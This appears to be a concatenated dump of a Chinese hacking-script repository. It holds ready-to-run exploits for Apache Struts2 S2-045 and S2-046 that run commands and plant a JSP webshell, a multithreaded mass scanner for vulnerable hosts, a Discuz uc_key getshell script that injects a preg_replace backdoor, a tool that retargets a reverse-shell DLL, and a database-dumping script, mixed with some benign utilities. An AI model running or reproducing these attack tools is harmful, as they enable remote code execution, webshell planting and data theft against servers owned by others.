| 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | Form 53 | 54 | 55 | Form1.cs 56 | 57 | 58 | 59 | 60 | Form1.cs 61 | 62 | 63 | ResXFileCodeGenerator 64 | Resources.Designer.cs 65 | Designer 66 | 67 | 68 | True 69 | Resources.resx 70 | 71 | 72 | SettingsSingleFileGenerator 73 | Settings.Designer.cs 74 | 75 | 76 | True 77 | Settings.settings 78 | True 79 | 80 | 81 | 82 | 89 | -------------------------------------------------------------------------------- /struts2/s2045一键getshell/readme.txt: -------------------------------------------------------------------------------- 1 | python pi_struts2-045.py url.txt 8 -------------------------------------------------------------------------------- /struts2/s2045一键getshell/tmp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2045一键getshell/tmp.txt -------------------------------------------------------------------------------- /struts2/s2045一键getshell/url.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2045一键getshell/url.txt -------------------------------------------------------------------------------- /struts2/s2getshell.py: -------------------------------------------------------------------------------- 1 | import urllib 2 | import urllib2 3 | import sys,getopt,ctypes 4 | def exp(url,payload): 5 | try: 6 | opener = urllib2.build_opener() 7 | urllib2.install_opener(opener) 8 | req = urllib2.Request(url) 9 | req.add_header('Content-Type',payload) 10 | return opener.open(req, "").read() 11 | except urllib2.URLError,e: 12 | return "fail" 13 | return "fail" 14 | class Color: 15 | std_out_handle = ctypes.windll.kernel32.GetStdHandle(-11) 16 | def print_(self, print_text): 17 | print print_text 18 | def print_green_text(self, print_text): 19 | self.set_cmd_color(0x02 | 0x08) 20 | print print_text 21 | self.reset_color() 22 | def print_red_text(self, print_text): 23 | self.set_cmd_color(0x04 | 0x08) 24 | print print_text 25 | self.reset_color() 26 | def reset_color(self): 27 | self.set_cmd_color(0x04 | 0x02 | 0x01) 28 | def set_cmd_color(self, color, handle=std_out_handle): 29 | bool = ctypes.windll.kernel32.SetConsoleTextAttribute(handle, color) 30 | return bool 31 | jspCode = "By<%new java.io.FileOutputStream(request.getParameter(\\\"f\\\")).write(request.getParameter(\\\"c\\\").getBytes());%>Luan" 32 | clr = Color() 33 | clr.print_green_text("S2-045 Exploit // Code By Luan QQ:1524946693") 34 | opts, args = getopt.getopt(sys.argv[1:], "u:c:p:") 35 | url,cmd,path = "","","" 36 | for op, value in opts: 37 | if op == '-u': 38 | url = value 39 | elif op == '-c': 40 | cmd = value 41 | elif op == '-p': 42 | path = value 43 | if url == "": 44 | clr.print_red_text("Useage : exp.py -u url [-c cmd] [-p upfilePath]") 45 | sys.exit(0) 46 | if cmd == "": 47 | clr.print_("upload webshell ...") 48 | if path == "": 49 | path = "#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest').getSession().getServletContext().getRealPath('/')" 50 | else: 51 | path = "'" + path + "'" 52 | payload = "%{(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#luan='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#path=" + path + ").(#shell='" + jspCode + "').(new java.io.BufferedWriter(new java.io.FileWriter(#path+'/luan.jsp').append(#shell)).close()).(#cmd='echo \\\"write file to '+#path+'/luan.jsp\\\"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" 53 | else: 54 | clr.print_("run " + cmd + " ...") 55 | payload = "%{(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#luan='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='" + cmd + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" 56 | result = exp(url,payload) 57 | if result == "fail": 58 | clr.print_red_text("Exploit Fail") 59 | else: 60 | clr.print_green_text(result) -------------------------------------------------------------------------------- /struts2/st2-046-poc/README.MD: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/st2-046-poc/README.MD -------------------------------------------------------------------------------- /struts2/st2-046-poc/exploit-cd.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | url=$1 4 | cmd=$2 5 | shift 6 | shift 7 | 8 | boundary="---------------------------735323031399963166993862150" 9 | content_type="multipart/form-data; boundary=$boundary" 10 | payload=$(echo "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"$cmd"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}") 11 | 12 | printf -- "--$boundary\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--$boundary--\r\n\r\n" "$payload" | curl "$url" -H "Content-Type: $content_type" -H "Expect: " -H "Connection: close" --data-binary @- $@ -------------------------------------------------------------------------------- /struts2/st2-046-poc/reqnull.txt: -------------------------------------------------------------------------------- 1 | POST / HTTP/1.1 2 | Host: localhost:8080 3 | Connection: close 4 | Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150 5 | Content-Length: 5000 6 | 7 | -----------------------------735323031399963166993862150 8 | Content-Disposition: form-data; name="foo"; filename="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='hostname').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}b" 9 | Content-Type: text/plain 10 | 11 | x 12 | -----------------------------735323031399963166993862150-- -------------------------------------------------------------------------------- /struts2/st2-046-poc/st2-046.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/st2-046-poc/st2-046.jpg -------------------------------------------------------------------------------- /struts2/st2-046-poc/st2-046.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/st2-046-poc/st2-046.png -------------------------------------------------------------------------------- /struts2/str2-045.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/str2-045.txt -------------------------------------------------------------------------------- /struts2/struts2_045 多线程批量检测脚本.py: -------------------------------------------------------------------------------- 1 | import urllib2 2 | from poster.encode import multipart_encode 3 | from poster.streaminghttp import register_openers 4 | import threading 5 | def poc(url): 6 | register_openers() 7 | datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")}) 8 | header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" 9 | header["Content-Type"]="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo nMask').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" 10 | try: 11 | request = urllib2.Request(url,datagen,headers=header) 12 | response = urllib2.urlopen(request,timeout=5) 13 | body=response.read() 14 | except: 15 | body="" 16 | if "nMask" in body: 17 | print "[Loopholes exist]",url 18 | f.write(url+"\n") 19 | else: 20 | print "Loopholes not exist",url 21 | if __name__=="__main__": 22 | ''' 23 | url.txt为待检测url列表 24 | result.txt为检测完输出结果文件 25 | ''' 26 | f=open("result.txt","a") 27 | url_list=[i.replace("\n","") for i in open("url.txt","r").readlines()] 28 | for url in url_list: 29 | threading.Thread(target=poc,args=(url,)).start() 30 | while 1: 31 | if(len(threading.enumerate())<50): 32 | break -------------------------------------------------------------------------------- /struts2批量查询.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding:utf-8 -*- 3 | import requests 4 | a = open("ip.txt","r") 5 | b = ("/index.action","/index.do","/login.do","/login.action") 6 | x = open("success.txt","w") 7 | for c in a: 8 |         d = c.strip() 9 |         for e in b: 10 |                 g = requests.get(str(d) + str(e)) 11 |                 print g.url 12 |                 if g.status_code == 200: 13 |                         print>>x,g.url         14 | a.close() 15 | x.close() 16 | -------------------------------------------------------------------------------- /t00lsAddTu/config.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/evn python 2 | # -*- coding:utf-8 -*- 3 | # author t0ols 4 | 5 | # 域名 6 | DOMAIN = r'https://www.t00ls.net/' # 域名必须用/结束,不然与下面的拼接不成功 7 | USERNAME = 'xxxxx' #用户名 8 | PASSWORD = 'xxxx' #密码 9 | QUESTIONID = 5 # 0 空 1 母亲的名字 2 爷爷的名字 3 父亲出生的城市 4 您其中一位老师的名字 5您个人计算机的型号 6 您最喜欢的餐馆名称 7 驾驶执照的最后四位数字 10 | ANSWER = 'xxxx' #答案 11 | LOGINFIELD = r'用户名' #用户名 12 | COOKIETIME = 2592000 13 | 14 | HOMEURL = DOMAIN + r't00ls_domain.php' 15 | CHECKURL = DOMAIN + r'members-tubilog-xxxxx.html' #这里记得一定要修改才行的 16 | LOGINURL = DOMAIN + r'logging.php?action=login&infloat=yes&handlekey=login&inajax=1&ajaxtarget=fwin_content_login' 17 | -------------------------------------------------------------------------------- /t00lsAddTu/config.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/t00lsAddTu/config.pyc -------------------------------------------------------------------------------- /t00lsAddTu/discuz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/evn python 2 | # -*- coding:utf-8 -*- 3 | # author t0ols 4 | 5 | import re 6 | import requests 7 | import config 8 | import hashlib 9 | from bs4 import BeautifulSoup 10 | import time 11 | import random 12 | 13 | 14 | class Discuz(object): 15 | def __init__(self): 16 | self.nowDate = time.strftime('%Y-%m-%d', time.localtime(time.time())) 17 | self.operate = '' # response的对象(不含read) 18 | self.formhash = '' # 没有formhash不能发帖 19 | 20 | self.s = requests.session() 21 | # self.formhash_pattern = re.compile(r'') 22 | self.formhash_pattern = re.compile(r'') 23 | UA = "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36" 24 | self.header = {"User-Agent": UA, 25 | "Referer": "https://www.t00ls.net/", 26 | } 27 | self.url = 'https://www.t00ls.net/logging.php?action=login&infloat=yes&handlekey=login&inajax=1&ajaxtarget=fwin_content_login' 28 | 29 | def login(self, username, password, questionid, answer): 30 | md5 = hashlib.md5() 31 | md5.update(password.encode('utf-8')) 32 | password = md5.hexdigest() 33 | getFormhashHtml = self.s.get(self.url, headers=self.header) 34 | formhashBS4 = BeautifulSoup(getFormhashHtml.text, 'lxml') 35 | formhash = formhashBS4.find('input', {'name': 'formhash'})['value'] 36 | 37 | loginData = { 38 | 'formhas': formhash, 39 | 'referer': self.url, 40 | 'loginfield': config.LOGINFIELD, # username or email 41 | 'username': username, 42 | 'password': password, 43 | 'questionid': questionid, 44 | 'answer': answer, 45 | 'loginsubmit': 'true', 46 | 'cookietime': config.COOKIETIME, 47 | } 48 | self.s.post(self.url, headers=self.header, data=loginData) 49 | Cookie = "UTH_cookietime=2592000; UTH_auth={UTH_auth}; UTH_sid={UTH_sid}".format( 50 | UTH_auth=self.s.cookies['UTH_auth'], 51 | UTH_sid=self.s.cookies['UTH_sid']) 52 | self.header['Cookie'] = Cookie 53 | 54 | def check(self): 55 | selectTB = self.s.get(config.CHECKURL, headers=self.header).content 56 | soup = BeautifulSoup(selectTB, 'lxml') 57 | tbody = soup.find('tbody') 58 | for item in tbody.findAll('tr'): 59 | # print item 60 | if self.nowDate in item.text and u'域名' in item.text: 61 | print '*' * 30 62 | print '今日土币已领完,请明日继续!' 63 | print '详细信息:' 64 | print item.text 65 | print '*' * 30 66 | exit() 67 | 68 | def cha(self, domain): 69 | print '[+] Checking {}'.format(domain) 70 | getFormhashHtml = self.s.get(config.HOMEURL, headers=self.header) 71 | formhashBS4 = BeautifulSoup(getFormhashHtml.text, 'lxml') 72 | formhash_cha = formhashBS4.findAll('input', {'name': 'formhash'}) 73 | formhash_cha = formhash_cha[0]['value'] 74 | # print formhash_cha 75 | 76 | data = {'querydomainsubmit': '\xe6\x9f\xa5\xe8\xaf\xa2', 'domain': u'Rockislandauction.com', 77 | 'formhash': '31d70cec',} 78 | data['domain'] = domain 79 | data['formhash'] = formhash_cha 80 | data['querydomainsubmit'] = u'查询' 81 | 82 | html = self.s.post(config.HOMEURL, headers=self.header, data=data).text 83 | # print html 84 | if u'注册信息' in html: 85 | print '{} 查询成功!'.format(domain) 86 | 87 | def getDomain(self): 88 | url = 'http://www.alexa.com/topsites/category;{}/Top/Business/Business_Services'.format(random.randint(1, 19)) 89 | # url='http://www.alexa.com/topsites/category;19/Top/Business/Business_Services/Communications' 90 | soup = BeautifulSoup(requests.get(url).content, 'lxml') 91 | domainList = [] 92 | for item in soup.find_all('p', attrs={'class': 'desc-paragraph'}): 93 | doamin = item.a.get_text().replace('/', '').replace('Https:', '').replace('http:', '') 94 | domainList.append(doamin) 95 | return domainList 96 | -------------------------------------------------------------------------------- /t00lsAddTu/discuz.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/t00lsAddTu/discuz.pyc -------------------------------------------------------------------------------- /t00lsAddTu/login.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/evn python 2 | # -*- coding:utf-8 -*- 3 | # author t0ols 4 | 5 | import config 6 | import discuz 7 | 8 | if __name__ == '__main__': 9 | try: 10 | my_account = discuz.Discuz() # 实例化对象 11 | my_account.login(config.USERNAME, config.PASSWORD, config.QUESTIONID, config.ANSWER) # 从配置文件中把相关参数传过去 12 | for item in my_account.getDomain(): 13 | my_account.cha(item) 14 | my_account.check() 15 | except Exception as e: 16 | print e 17 | -------------------------------------------------------------------------------- /url.py: -------------------------------------------------------------------------------- 1 | #! usr/bin/env python 2 | #coding = UTF-8 3 | 4 | import os 5 | import re 6 | 7 | print ''' 8 | ================================================================== 9 | = By: Barrett = 10 | = QQ: 2463917215 = 11 | = Oursite:bbs.blackbap.org = 12 | ================================================================== 13 | ''' 14 | 15 | if __name__ == '__main__': 16 | try: 17 | url = open('url.txt', 'r') 18 | except: 19 | print 'you do not have the file url.txt' 20 | else: 21 | tmp = [tmp.split('?')[0] for tmp in url] 22 | tmp = {}.fromkeys(tmp).keys() 23 | nex = '\n' 24 | result = open('result.txt', 'w') 25 | result.write(nex.join(tmp)) 26 | result.close() 27 | 28 | -------------------------------------------------------------------------------- /weakfilescan.txt: -------------------------------------------------------------------------------- 1 | if __name__ == "__main__": 2 | if len(sys.argv) == 2: 3 | print '2' 4 | print json.dumps(start_wyspider(sys.argv[1]), indent=2) 5 | sys.exit(0) 6 | elif len(sys.argv)==3: 7 | for i in open(sys.argv[2]): 8 | print i 9 | print json.dumps(start_wyspider(str(i).strip()), indent=2) 10 | sys.exit(0) 11 | else: 12 | print ("usage: %s http://wuyun.org" % sys.argv[0]) 13 | print ("usage: %s -u url.txt" % sys.argv[0]) 14 | sys.exit(-1) 15 | 16 | if __name__ == "__main__": 17 | f = file("result.txt","a+") 18 | result = "test" 19 | if len(sys.argv) == 2: 20 | result = json.dumps(start_wyspider(sys.argv[1]), indent=2) 21 | f.write(result) 22 | print result 23 | sys.exit(0) 24 | elif len(sys.argv)==3: 25 | for i in open(sys.argv[2]): 26 | result = json.dumps(start_wyspider(str(i).strip()), indent=2) 27 | f.write(result) 28 | print result 29 | sys.exit(0) 30 | else: 31 | print ("usage: %s http://wuyun.org" % sys.argv[0]) 32 | print ("usage: %s -u url.txt" % sys.argv[0]) 33 | sys.exit(-1) 34 | 加了点代码 35 | 扫描完成后会写入结果在当前目录,生成文件result.txt(代码很搓,有点冗余) 36 | 加了个用法:python wyspider.py -u url.txt (从当前目录url.txt循环取url然后开始扫描) -------------------------------------------------------------------------------- /webshell下远程连接linux服务器并执行命令工具/plink.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/webshell下远程连接linux服务器并执行命令工具/plink.exe -------------------------------------------------------------------------------- /webshell下远程连接linux服务器并执行命令工具/plink用法.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/webshell下远程连接linux服务器并执行命令工具/plink用法.txt -------------------------------------------------------------------------------- /一个小脚本查看PC连接过的WIFI密码.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/一个小脚本查看PC连接过的WIFI密码.bat -------------------------------------------------------------------------------- /一键实现--强制通过VPN上网,VPN断线就断网.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | TITLE Set forced through the VPN to the Internet , plz run as administrator! by t00ls.net 3 | :menu 4 | echo. 5 | echo =============================================================================== 6 | echo. 7 | echo 1. Set forced through the VPN to the Internet , plz run as administrator 8 | echo 2. Delete your setttings in 1 , plz run as administrator 9 | echo 3. Query your settings IP 10 | echo 4. exit 11 | echo. by t00ls.net 12 | echo. 13 | 14 | set /p select=plz select: 15 | if /i "%select%"=="1" goto 1 16 | if /i "%select%"=="2" goto 2 17 | if /i "%select%"=="3" goto 3 18 | if /i "%select%"=="4" goto 4 19 | echo error select&pause&%0 20 | :1 21 | echo. 22 | echo Examples: 23 | echo 10.0.0.1 or 10.0.0.1-10.0.0.254 or 10.0.0.1/24 24 | echo 10.0.0.1,192.168.1.1,10.10.10.0/24 25 | echo use , to separate multiple IPs 26 | echo. 27 | set /p ip=Set Your IP Address: 28 | echo netsh advfirewall set allprofiles firewallpolicy allowinbound,blockoutbound 29 | netsh advfirewall set allprofiles firewallpolicy allowinbound,blockoutbound 30 | echo netsh advfirewall firewall add rule name="allowvpn1" dir=out action=allow enable=yes remoteip="%ip%" 31 | netsh advfirewall firewall add rule name="allowvpn1" dir=out action=allow enable=yes remoteip="%ip%" 32 | echo netsh advfirewall firewall add rule name="allowvpnremote1" dir=out action=allow enable=yes interfacetype=ras 33 | netsh advfirewall firewall add rule name="allowvpnremote1" dir=out action=allow enable=yes interfacetype=ras 34 | goto menu 35 | 36 | :2 37 | echo. 38 | echo netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound 39 | netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound 40 | echo netsh advfirewall firewall delete rule name="allowvpn1" 41 | netsh advfirewall firewall delete rule name="allowvpn1" 42 | echo netsh advfirewall firewall delete rule name="allowvpnremote1" 43 | netsh advfirewall firewall delete rule name="allowvpnremote1" 44 | goto menu 45 | 46 | :3 47 | echo. 48 | echo You have set the IP 49 | netsh advfirewall firewall show rule name="allowvpn1" |findstr IP 50 | if %errorlevel% NEQ 0 (echo. 51 | echo ----Not Found IP---- 52 | echo. 53 | echo.) else echo. 54 | goto menu 55 | 56 | :4 57 | exit -------------------------------------------------------------------------------- /全自动脱裤脚本.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 1,先给目标表减肥 (目的是把无用的字段去掉,减小体积) 4 | 5 | CREATE TABLE user4 AS SELECT uid,name,email,members_pass FROM ips_members; 6 | 7 | " . $row['testtext']; 41 | echo "
    "; 42 | file_put_contents('D:/www/all.txt',implode(' ',$row)."\r\n",FILE_APPEND); 43 | } 44 | } 45 | 46 | $ifgoon = $ifgoon-1; 47 | if($ifgoon>0){ 48 | $startloc = $startloc + $selectnum; 49 | $locurl = "http://localhost/test.php?selectnum=".$selectnum."&startloc=".$startloc."&ifgoon=".$ifgoon; 50 | echo $locurl; 51 | echo ""; 54 | } 55 | } 56 | 57 | 58 | ?> 59 | 60 |
    61 | 查询条数: 62 | 63 |
    -------------------------------------------------------------------------------- /关于字典整理的一些shell命令.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/关于字典整理的一些shell命令.txt -------------------------------------------------------------------------------- /去重可排序.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # Author: Forsaken 4 | 5 | import getopt 6 | import os 7 | import sys 8 | 9 | def main(): 10 | try: 11 | opts, args = getopt.getopt(sys.argv[1:], 'hf:s', ['help', 'file=', 'sort']) 12 | except getopt.GetoptError as e: 13 | print('[-] %s' % e) 14 | usage() 15 | sys.exit(2) 16 | 17 | file = '' 18 | sort = False 19 | 20 | for o, a in opts: 21 | if o in ('-h', '--help'): 22 | usage() 23 | sys.exit() 24 | elif o in ('-f', '--file'): 25 | file = a 26 | elif o in ('-s', '--sort'): 27 | sort = True 28 | else: 29 | pass 30 | 31 | if not file: 32 | print('[-] File Arguments Not Found!') 33 | usage() 34 | sys.exit(2) 35 | 36 | if not os.path.exists(file): 37 | print('[-] File Not Found!') 38 | sys.exit(1) 39 | 40 | with open(file, 'r') as f: 41 | old = f.readlines() 42 | 43 | old_len = len(old) 44 | new = list() 45 | for o in old: 46 | if not o in new: 47 | new.append(o) 48 | new_len = len(new) 49 | delete = old_len - new_len 50 | 51 | if sort: 52 | new.sort() 53 | 54 | out = 'new_' + file 55 | with open(out, 'w') as f: 56 | f.writelines(new) 57 | 58 | print('Delete %s Line' % delete) 59 | print('Please Check %s' % out) 60 | 61 | def usage(): 62 | print('Usage: python %s [options]' % sys.argv[0]) 63 | print('') 64 | print('Options:') 65 | print(' -h, --help Show Help Message And Exit') 66 | print(' -f FILE, --file=FILE File') 67 | print(' -s, --sort Sort') 68 | 69 | if __name__ == '__main__': 70 | main() -------------------------------------------------------------------------------- /反弹dll ip修改小脚本(445 NC).py: -------------------------------------------------------------------------------- 1 | # -*- coding: cp936 -*- 2 | import re 3 | print "反弹dll 连接信息 修改小工具 by:jonyer" 4 | 5 | 6 | with open (raw_input("dll :"),'rb+')as f: 7 | byte=f.read().encode('hex') 8 | ip1=re.findall("76740000(.*?)0063",byte) 9 | print ip1[0].decode('hex') 10 | 11 | 12 | 13 | port=raw_input("port :").encode('hex') 14 | ip=raw_input("ip :").encode('hex') 15 | 16 | while len(port) <8: 17 | port+="00" 18 | if len(port) >= 8: 19 | 20 | pass 21 | while len(ip) <30: 22 | ip+="00" 23 | if len(ip) >= 30: 24 | 25 | pass 26 | 27 | 28 | 29 | length=len(ip1[0])-len(port+ip) 30 | zero=port+"0"*length+ip 31 | print zero.decode('hex') 32 | 33 | 34 | 35 | kkk=byte.replace(ip1[0],zero) 36 | f.seek(0) 37 | f.truncate(0) 38 | f.write(bytes(kkk.decode('hex'))) 39 | f.close() 40 | print "OK" 41 | raw_input('按回车键退出 :') -------------------------------------------------------------------------------- /在一堆文本中提取出 域名(脚本).php: -------------------------------------------------------------------------------- 1 | 0){ 14 | $domain_name=empty($domain[0])?'':trim($domain[0]); 15 | if(strlen($domain_name)>0){ 16 | $domain_name=@trim($domain_name,'/'); 17 | $domain_name=@trim($domain_name,'-'); 18 | $domain_name=@trim($domain_name,'_'); 19 | return $domain_name; 20 | } 21 | } 22 | } 23 | 24 | foreach (glob("./txt/*.txt") as $filename) { 25 | foreach (file ($filename) as $str){ 26 | echo domain(trim($str)).PHP_EOL; 27 | } 28 | 29 | } 30 | ?> -------------------------------------------------------------------------------- /处理awvs10.5扫描结果xml文件的py脚本: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/处理awvs10.5扫描结果xml文件的py脚本 -------------------------------------------------------------------------------- /字典加dz uc_key getshell/discuz_getshell.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import hashlib 3 | import time 4 | import math 5 | import base64 6 | import urllib2 7 | import urllib 8 | import re 9 | import requests 10 | import json 11 | global cookie 12 | global formhash 13 | def microtime(get_as_float = False) : 14 | if get_as_float: 15 | return time.time() 16 | else: 17 | return '%.8f %d' % math.modf(time.time()) 18 | def get_authcode(string, key = ''): 19 | ckey_length = 4 20 | key = hashlib.md5(key).hexdigest() 21 | keya = hashlib.md5(key[0:16]).hexdigest() 22 | keyb = hashlib.md5(key[16:32]).hexdigest() 23 | keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:] 24 | cryptkey = keya + hashlib.md5(keya+keyc).hexdigest() 25 | key_length = len(cryptkey) 26 | string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string 27 | string_length = len(string) 28 | result = '' 29 | box = range(0, 256) 30 | rndkey = dict() 31 | for i in range(0,256): 32 | rndkey[i] = ord(cryptkey[i % key_length]) 33 | j=0 34 | for i in range(0,256): 35 | j = (j + box[i] + rndkey[i]) % 256 36 | tmp = box[i] 37 | box[i] = box[j] 38 | box[j] = tmp 39 | a=0 40 | j=0 41 | for i in range(0,string_length): 42 | a = (a + 1) % 256 43 | j = (j + box[a]) % 256 44 | tmp = box[a] 45 | box[a] = box[j] 46 | box[j] = tmp 47 | result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256])) 48 | length=len(result) 49 | return keyc + base64.b64encode(result).replace('=', '') 50 | def get_cookie_formhash(host): 51 | global cookie 52 | global formhash 53 | headers = {'content-type': 'application/json'} 54 | r=requests.get(host,headers=headers) 55 | cookie=r.cookies 56 | hash=re.findall(r'formhash" value="[0-9A-z]{1,10}"',r.text) 57 | _formhash=re.findall(r'"[0-9A-z]{1,10}"',hash[0]) 58 | formhash=_formhash[0].replace('"','') 59 | def getshell(host,key): 60 | global cookie 61 | global formhash 62 | header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'} 63 | tm=time.time()+10*3600 64 | agent=hashlib.md5("Mozilla/5.0 (Windows NT 6.1; WOW64)") 65 | string="agent=%s&time=%s&action=updatebadwords" % (agent,tm) 66 | code=urllib.quote(get_authcode(string,key)) 67 | get_cookie_formhash(host) 68 | url="%s/api/uc.php?code=%s&formhash=%s" % (host,code,formhash) 69 | payload=''' 70 | 71 | 72 | /admin/e 73 | @preg_replace(chr(47).chr(47).chr(101),$_POST[c],chr(098)); 74 | 75 | ''' 76 | r=requests.post(url,data=payload,cookies=cookie,headers=header) 77 | print url 78 | print r.text 79 | if re.findall('^1',r.text): 80 | print 'success shell is %s/forum.php?mod=ajax&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=checkusername&username=admin password is c' % (host) 81 | if __name__ == '__main__': 82 | commands=sys.argv[1:2] 83 | keys=sys.argv[2:] 84 | 